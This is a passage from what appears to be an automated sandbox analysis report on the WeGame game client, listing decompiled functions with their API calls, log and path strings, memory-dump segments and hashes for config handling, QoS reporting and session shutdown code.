                                                                  • Part of subcall function 6BD4885B: ?absolute@filesystem@ierd_tgp@@YA?AVpath@12@ABV312@0@Z.COMMON(?,?,?,?,0000008C,6BD4758E,?,000001E8,6BD470FC,?,?), ref: 6BD488BA
                                                                  • Part of subcall function 6BD4885B: ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@AAVerror_code@std@@@Z.COMMON(?,?,?,?,?,?,0000008C,6BD4758E,?,000001E8,6BD470FC,?,?), ref: 6BD48922
                                                                  • Part of subcall function 6BD4885B: ??0path@filesystem@ierd_tgp@@QAE@$$QAV012@@Z.COMMON(00000000,?,?,?,00000000,?), ref: 6BD48934
                                                                  • Part of subcall function 6BD0A8F0: memmove.VCRUNTIME140(?,?,6BD15839,?,?,00000000,?,?,6BD15839,?,?), ref: 6BD0A917
                                                                • ?get_cfg@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABVpath@filesystem@2@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@@Z.COMMON(?,00000000,?,files,00000005,?,?,?,?,?,?,?,?,000001E8,6BD470FC,?), ref: 6BD475C7
                                                                  • Part of subcall function 6BD46FC9: ?get_cfg@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABVpath@filesystem@2@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N3@Z.COMMON(?,?,?,00000001,00000000,?,6BD475CC,?,00000000,?,files,00000005), ref: 6BD46FD9
                                                                • ?u8_to_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAVpath@filesystem@2@@Z.COMMON(?,?,?,?,0000002E,?), ref: 6BD4769E
                                                                • ?cfg_folder@File_info@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?,?,?,0000002E,?), ref: 6BD476D1
                                                                  • Part of subcall function 6BD4616F: __EH_prolog3_GS.LIBCMT ref: 6BD46176
                                                                  • Part of subcall function 6BD4616F: ?root_full_path@File_info@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?), ref: 6BD46189
                                                                  • Part of subcall function 6BD4616F: ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?), ref: 6BD4619B
                                                                  • Part of subcall function 6BD4616F: ?wstring@path@filesystem@ierd_tgp@@QBE?BV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ.COMMON(?,?), ref: 6BD461AA
                                                                  • Part of subcall function 6BD4616F: ??0path@filesystem@ierd_tgp@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(00000000,?,?), ref: 6BD461B6
                                                                • ?absolute@filesystem@ierd_tgp@@YA?AVpath@12@ABV312@0@Z.COMMON(?,?,00000000,?,?,?,0000002E,?), ref: 6BD476E6
                                                                  • Part of subcall function 6BD5FD7B: __EH_prolog3_GS.LIBCMT ref: 6BD5FD85
                                                                  • Part of subcall function 6BD5FD7B: ?is_absolute@path@filesystem@ierd_tgp@@QBE_NXZ.COMMON ref: 6BD5FDA8
                                                                  • Part of subcall function 6BD5FD7B: ??0path@filesystem@ierd_tgp@@QAE@$$QAV012@@Z.COMMON(00000000), ref: 6BD5FE1D
                                                                  • Part of subcall function 6BD5FD7B: ?root_name@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,00000000), ref: 6BD5FE8E
                                                                  • Part of subcall function 6BD5FD7B: ?root_name@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,00000000), ref: 6BD5FE9E
                                                                  • Part of subcall function 6BD5FD7B: ?root_directory@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,?,00000000), ref: 6BD5FEAD
                                                                  • Part of subcall function 6BD5FD7B: ??0path@filesystem@ierd_tgp@@QAE@$$QAV012@@Z.COMMON(?,?,?,?,00000000), ref: 6BD5FEC2
                                                                  • Part of subcall function 6BD1D1A7: memmove.VCRUNTIME140(?,?,00000018,?,?), ref: 6BD1D1C5
                                                                  • Part of subcall function 6BD1D1A7: memmove.VCRUNTIME140(?,0000000F,00000018,?,?,00000018,?,?), ref: 6BD1D1CE
                                                                  • Part of subcall function 6BD1D1A7: memmove.VCRUNTIME140(0000000F,?,00000018,?,0000000F,00000018,?,?,00000018,?,?), ref: 6BD1D1DA
                                                                  • Part of subcall function 6BD0A3A0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6BD162D8,00000000,6BD16649,00000003,1F5A0D44,?,?,00000000,6BF764F4,000000FF,?,6BD15B05,00000000), ref: 6BD0A3E5
                                                                Strings
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\cfg_file.cpp, xrefs: 6BD477C7
                                                                • relate path string to path fail, xrefs: 6BD477DE
                                                                • files, xrefs: 6BD475AA
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@$??0path@filesystem@ierd_tgp@@File_info@common@ierd_tgp@@V123@Vpath@filesystem@3@memmove$E@$$H_prolog3_V012@@Vpath@12@$?absolute@filesystem@ierd_tgp@@?get_cfg@common@ierd_tgp@@?root_full_path@?root_name@path@filesystem@ierd_tgp@@U?$char_traits@_U?$less@V12@V312@0@V?$allocator@_V?$basic_ptree@V?$basic_string@_Vpath@filesystem@2@W@std@@$?cfg_folder@?exists@filesystem@ierd_tgp@@?get_cfg_module_path@?is_absolute@path@filesystem@ierd_tgp@@?parent_path@path@filesystem@ierd_tgp@@?root_directory@path@filesystem@ierd_tgp@@?u8_to_path@common@ierd_tgp@@?wstring@path@filesystem@ierd_tgp@@D@2@@std@@@2@@property_tree@boost@@@D@2@@std@@@2@@property_tree@boost@@_H_prolog3H_prolog3_catch_Verror_code@std@@@Vpath@filesystem@2@@W@2@@std@@W@2@@std@@@_invalid_parameter_noinfo_noreturn
                                                                • String ID: e:\dailybuild_dev\wegame_client\codes\common\src\cfg_file.cpp$files$relate path string to path fail
                                                                • API String ID: 320823597-2977455971
                                                                • Opcode ID: 1288f262858b0c0e1181e0038ddbe22ec44fc1173c8a6e326e22bd7ac154fcbb
                                                                • Instruction ID: f4e20aba68eb4aa7caede937f6c6d4bffde932398ce9d333918d0a8cfad3439c
                                                                • Opcode Fuzzy Hash: 1288f262858b0c0e1181e0038ddbe22ec44fc1173c8a6e326e22bd7ac154fcbb
                                                                • Instruction Fuzzy Hash: C0C18B31C0928CEADF15CBF8C955BCDBBB4AF26318F5480D9D045AB181EB785B48DB62
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD95CE6 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 174threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD95CF0
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(0000009C,6BD56BD6,?,00000001,?,00000000,0000008C,6BD577C5,00000002,00000000,?), ref: 6BD95CFF
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(0000009C,6BD56BD6,?,00000001,?,00000000,0000008C,6BD577C5,00000002,00000000,?), ref: 6BD95D5D
                                                                • GetCurrentThreadId.KERNEL32 ref: 6BD95DEB
                                                                • std::_Cnd_initX.LIBCPMT ref: 6BD95E2D
                                                                • ?PushUniqueThreadAsyncTask@common@ierd_tgp@@YAIV?$function@$$A6AXXZ@std@@IK@Z.COMMON(?,?), ref: 6BD95EA1
                                                                • std::_Cnd_initX.LIBCPMT ref: 6BD95EB0
                                                                  • Part of subcall function 6BD1A5EF: __EH_prolog3.LIBCMT ref: 6BD1A5F6
                                                                  • Part of subcall function 6BD1E945: __EH_prolog3_catch_GS.LIBCMT ref: 6BD1E94C
                                                                  • Part of subcall function 6BD918D2: __EH_prolog3.LIBCMT ref: 6BD918D9
                                                                  • Part of subcall function 6BD90F82: __EH_prolog3.LIBCMT ref: 6BD90F89
                                                                • ?PushUniqueThreadAsyncTask@common@ierd_tgp@@YAIV?$function@$$A6AXXZ@std@@IK@Z.COMMON(?,?,?,?,?,?,?,?,?,00000002,00000000,6BD43A1D), ref: 6BD95F1F
                                                                  • Part of subcall function 6BD31650: __EH_prolog3.LIBCMT ref: 6BD31657
                                                                • ?real_report@Qos@qos@adapt_for_imports@ierd_tgp@@QAE_NABUQos_data_base@234@@Z.COMMON(6BD43A1D,0000009C,6BD56BD6,?,00000001,?,00000000,0000008C,6BD577C5,00000002,00000000,?), ref: 6BD95F40
                                                                  • Part of subcall function 6BD952CF: __EH_prolog3_GS.LIBCMT ref: 6BD952D6
                                                                  • Part of subcall function 6BD952CF: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(0000007C,6BD95F45,6BD43A1D,0000009C,6BD56BD6,?,00000001,?,00000000,0000008C,6BD577C5,00000002,00000000,?), ref: 6BD952E8
                                                                Strings
                                                                • [qos_t]Offline mode, disable QOS report: %d., xrefs: 6BD95D3B
                                                                • [qos_t] qos report arrived, qos_kind = %d, xrefs: 6BD95DA0
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\qos_command.cpp, xrefs: 6BD95D23, 6BD95D84
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$?get_log_instance@base@@Logger@1@Thread$AsyncCnd_initH_prolog3_PushTask@common@ierd_tgp@@UniqueV?$function@$$Z@std@@std::_$?real_report@CurrentH_prolog3_catch_Qos@qos@adapt_for_imports@ierd_tgp@@Qos_data_base@234@@
                                                                • String ID: [qos_t] qos report arrived, qos_kind = %d$[qos_t]Offline mode, disable QOS report: %d.$e:\dailybuild_dev\wegame_client\codes\common\src\qos_command.cpp
                                                                • API String ID: 2287011652-593713976
                                                                • Opcode ID: b0852e8ff2a1189cd05937bc0a45b43c2dba65c60de3a2581051aa15d49f18ee
                                                                • Instruction ID: af3860203fd6efd7026dc2635155b79cfa0a244ec22e94f85586ded091c7f0d2
                                                                • Opcode Fuzzy Hash: b0852e8ff2a1189cd05937bc0a45b43c2dba65c60de3a2581051aa15d49f18ee
                                                                • Instruction Fuzzy Hash: 4A61B370D01318EBDF00EFB4D845B9DBBB5AF12728F2081A9D459AF281DB399B05DB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004626E7 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 123COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 004626EE
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000054), ref: 004626FB
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,00000054), ref: 0046277D
                                                                • ?enable_app_session_end@common@ierd_tgp@@YAX_N@Z.COMMON(00000001,?,?,?,?,00000054), ref: 004627D6
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000054), ref: 004627F1
                                                                • ?enable_app_session_end@common@ierd_tgp@@YAX_N@Z.COMMON(00000001,00000054), ref: 00462851
                                                                • ?exit_app@Application@common@ierd_tgp@@QAEXH@Z.COMMON(00000001,00000054), ref: 00462860
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                  • Part of subcall function 0043F4BB: __EH_prolog3_catch_GS.LIBCMT ref: 0043F4C2
                                                                • DefWindowProcA.USER32(?,?,?,?,00000054), ref: 00462873
                                                                Strings
                                                                • [main] query end session, shutdown!, xrefs: 0046282C
                                                                • [main]OnRecvMsg2, msg:%x, wParam:%d, xrefs: 0046273A
                                                                • [main] ending session, shutdown!, xrefs: 004627B8
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp, xrefs: 00462722, 004627A1, 00462815
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@Logger@1@$?enable_app_session_end@common@ierd_tgp@@$?exit_app@Application@common@ierd_tgp@@H_prolog3H_prolog3_H_prolog3_catch_ProcWindow
                                                                • String ID: [main] ending session, shutdown!$[main] query end session, shutdown!$[main]OnRecvMsg2, msg:%x, wParam:%d$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp
                                                                • API String ID: 342782504-2890287630
                                                                • Opcode ID: b2a5d27b47852407f11a469fe3bb0425c6b6a16fd040a50d0d7011884f0a9a98
                                                                • Instruction ID: 48a3dd34d2062b4ff93b352457f65de05d1634d5688b771d81a73fff4434964a
                                                                • Opcode Fuzzy Hash: b2a5d27b47852407f11a469fe3bb0425c6b6a16fd040a50d0d7011884f0a9a98
                                                                • Instruction Fuzzy Hash: 2541D131E40700BBCB14FB61CC46F9E77609F15708F20465AF4516B2D6EBB89E05C74A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BDCD02A Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 181COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BDCD034
                                                                • memset.VCRUNTIME140(?,00000000,00000208,\config\client_info.info,000003E0,6BD8DDB1,?,6BDB2AD3), ref: 6BDCD093
                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000104,?,?,6BFAE570), ref: 6BDCD0A8
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,?,6BFAE570), ref: 6BDCD0AF
                                                                • PathFileExistsW.SHLWAPI(?), ref: 6BDCD1A4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: FileModule$ExistsH_prolog3_HandleNamePathmemset
                                                                • String ID: \config\client_info.info$client_id
                                                                • API String ID: 3144288800-1673508345
                                                                • Opcode ID: 1cbdd9e1f17569fe815aeb555640cc9d6f371da41ac3a5f8236e002854b9939c
                                                                • Instruction ID: 9fa44444fa887d5e7ff68541f46230e91d17b1bc34dad8b9751ac7529baab1f8
                                                                • Opcode Fuzzy Hash: 1cbdd9e1f17569fe815aeb555640cc9d6f371da41ac3a5f8236e002854b9939c
                                                                • Instruction Fuzzy Hash: B9818B70C95258DADF61DF64CC89BCDBBB8AF15318F1041E9D009AB1A0DB785B89CF62
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD95ABF Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 163COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD95AC9
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000003,00000001,0000011C,6BD954F0,00000000,00000001,00000002,00000001,?,00000002,6BD577C5,00000000,00000001,00000002,0000007C,6BD95F45), ref: 6BD95B1F
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000002,00000000,?), ref: 6BD95BC7
                                                                • Concurrency::details::platform::__RegisterWaitForSingleObject.LIBCONCRT(00000001,00000000,00000000,00000002,00000000,?), ref: 6BD95C24
                                                                  • Part of subcall function 6BD926A1: __EH_prolog3_GS.LIBCMT ref: 6BD926AB
                                                                  • Part of subcall function 6BD926A1: memset.VCRUNTIME140(?,00000000,00000104,00000868,6BD964A5,00000118,6BD95745,00000001,00000001,6BD577C5,00000000,00000001,?,00000000,?,00000002), ref: 6BD926C1
                                                                  • Part of subcall function 6BD926A1: memset.VCRUNTIME140(?,00000000,00000104,?,00000000,00000104,00000868,6BD964A5,00000118,6BD95745,00000001,00000001,6BD577C5,00000000,00000001,?), ref: 6BD926D1
                                                                  • Part of subcall function 6BD926A1: memset.VCRUNTIME140(?,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000868,6BD964A5,00000118,6BD95745,00000001,00000001,6BD577C5), ref: 6BD926DF
                                                                  • Part of subcall function 6BD926A1: memset.VCRUNTIME140(?,00000000,00000104,?,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000868,6BD964A5,00000118,6BD95745), ref: 6BD926ED
                                                                • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,?,?,00000002,00000000,?), ref: 6BD95C41
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(0000011C,6BD954F0,00000000,00000001,00000002,00000001,?,00000002,6BD577C5,00000000,00000001,00000002,0000007C,6BD95F45,6BD43A1D,0000009C), ref: 6BD95C6B
                                                                • Concurrency::details::platform::__RegisterWaitForSingleObject.LIBCONCRT(00000001,6BD43A1D,00000000,0000011C,6BD954F0,00000000,00000001,00000002,00000001,?,00000002,6BD577C5,00000000,00000001,00000002,0000007C), ref: 6BD95CD4
                                                                  • Part of subcall function 6BD261B6: ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(1F5A0D44,00000001,?,00000000,6BF78988,000000FF,?,6BD46F19,00000010,00000003,00000001,000000B4,6BD45267,00000000,?,?), ref: 6BD2620D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset$?get_log_instance@base@@Logger@1@$Concurrency::details::platform::__D@std@@@std@@H_prolog3_ObjectRegisterSingleU?$char_traits@Wait$??1?$basic_ios@??1?$basic_iostream@
                                                                • String ID: cannot report qos$e:\dailybuild_dev\wegame_client\codes\common\src\qos_command.cpp$handle is invalid, cannot report qos
                                                                • API String ID: 1310799271-1232453792
                                                                • Opcode ID: 856ed313d72984a1ca3c396cfc9cb9d58df511b70932b3dc713181200e0c1f48
                                                                • Instruction ID: c2daf217686628fa55a09136732045953bcdf745787012f73090c7242399a29d
                                                                • Opcode Fuzzy Hash: 856ed313d72984a1ca3c396cfc9cb9d58df511b70932b3dc713181200e0c1f48
                                                                • Instruction Fuzzy Hash: 3251DF31844204EADB15EBB4DC92FEE7B749F1132DF2001A8E5656F1D2EB3A9B45CB60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD96485 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 155COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD9648F
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000003,00000001,00000118,6BD95745,00000001,00000001,6BD577C5,00000000,00000001,?,00000000,?,00000002,6BD577C5,00000000,00000001), ref: 6BD964E1
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000001,6BD43A1D,00000000,00000003,00000001,00000118,6BD95745,00000001,00000001,6BD577C5,00000000,00000001,?,00000000,?,00000002), ref: 6BD96578
                                                                • Concurrency::details::platform::__RegisterWaitForSingleObject.LIBCONCRT(00000001,6BD43A1D,00000001,00000001,6BD43A1D,00000000,00000003,00000001,00000118,6BD95745,00000001,00000001,6BD577C5,00000000,00000001,?), ref: 6BD965D3
                                                                • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(00000002,00000000,?), ref: 6BD965F0
                                                                  • Part of subcall function 6BD926A1: __EH_prolog3_GS.LIBCMT ref: 6BD926AB
                                                                  • Part of subcall function 6BD926A1: memset.VCRUNTIME140(?,00000000,00000104,00000868,6BD964A5,00000118,6BD95745,00000001,00000001,6BD577C5,00000000,00000001,?,00000000,?,00000002), ref: 6BD926C1
                                                                  • Part of subcall function 6BD926A1: memset.VCRUNTIME140(?,00000000,00000104,?,00000000,00000104,00000868,6BD964A5,00000118,6BD95745,00000001,00000001,6BD577C5,00000000,00000001,?), ref: 6BD926D1
                                                                  • Part of subcall function 6BD926A1: memset.VCRUNTIME140(?,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000868,6BD964A5,00000118,6BD95745,00000001,00000001,6BD577C5), ref: 6BD926DF
                                                                  • Part of subcall function 6BD926A1: memset.VCRUNTIME140(?,00000000,00000104,?,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000868,6BD964A5,00000118,6BD95745), ref: 6BD926ED
                                                                • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(00000001,6BD43A1D,00000000,00000003,00000001,00000118,6BD95745,00000001,00000001,6BD577C5,00000000,00000001,?,00000000,?,00000002), ref: 6BD96610
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000118,6BD95745,00000001,00000001,6BD577C5,00000000,00000001,?,00000000,?,00000002,6BD577C5,00000000,00000001,00000002,0000007C), ref: 6BD9661A
                                                                • Concurrency::details::platform::__RegisterWaitForSingleObject.LIBCONCRT(00000001,6BD43A1D,00000001,00000118,6BD95745,00000001,00000001,6BD577C5,00000000,00000001,?,00000000,?,00000002,6BD577C5,00000000), ref: 6BD9667E
                                                                  • Part of subcall function 6BD261B6: ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(1F5A0D44,00000001,?,00000000,6BF78988,000000FF,?,6BD46F19,00000010,00000003,00000001,000000B4,6BD45267,00000000,?,?), ref: 6BD2620D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset$?get_log_instance@base@@D@std@@@std@@Logger@1@U?$char_traits@$??1?$basic_ios@Concurrency::details::platform::__H_prolog3_ObjectRegisterSingleWait$??1?$basic_iostream@
                                                                • String ID: cannot report qos by http$e:\dailybuild_dev\wegame_client\codes\common\src\qos_command.cpp$handle is invalid, cannot report qos
                                                                • API String ID: 123105886-177249518
                                                                • Opcode ID: e17476ba1bbc8a0389e83692a71015e7f86d43fd0235fd5095320d87b055451a
                                                                • Instruction ID: c879fb7ccc28072d2d97b3dcadf7c03879d496ad3262c1e19d655045238aae5b
                                                                • Opcode Fuzzy Hash: e17476ba1bbc8a0389e83692a71015e7f86d43fd0235fd5095320d87b055451a
                                                                • Instruction Fuzzy Hash: B751EC31940204AADB14EBB4DC56FED7B749F11728F200198A155AF1D2EF799B08CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BDB585A Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 153COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BDB5864
